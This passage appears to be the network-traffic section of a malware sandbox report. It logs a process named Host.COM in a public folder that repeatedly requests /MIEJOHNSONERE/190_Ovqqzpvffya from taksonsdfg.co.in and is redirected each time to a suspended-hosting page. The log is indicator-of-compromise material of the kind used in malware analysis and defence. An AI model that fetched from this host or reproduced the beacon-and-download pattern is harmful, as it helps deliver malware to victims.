2024-11-26 08:38:59 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49845	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:01 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:01 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:01 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:01 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49851	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:03 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:03 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:03 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:03 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:03 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49858	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:05 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:06 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:05 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:06 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49866	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:07 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:08 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:07 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:08 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:08 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49874	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:09 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:10 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:10 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:10 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49879	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:11 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:12 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:12 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:12 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:12 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49886	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:14 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:14 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:14 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:14 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49890	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:16 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:17 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:16 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:17 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:17 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49899	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:18 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:19 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:19 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:19 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49903	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:20 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:21 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:21 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
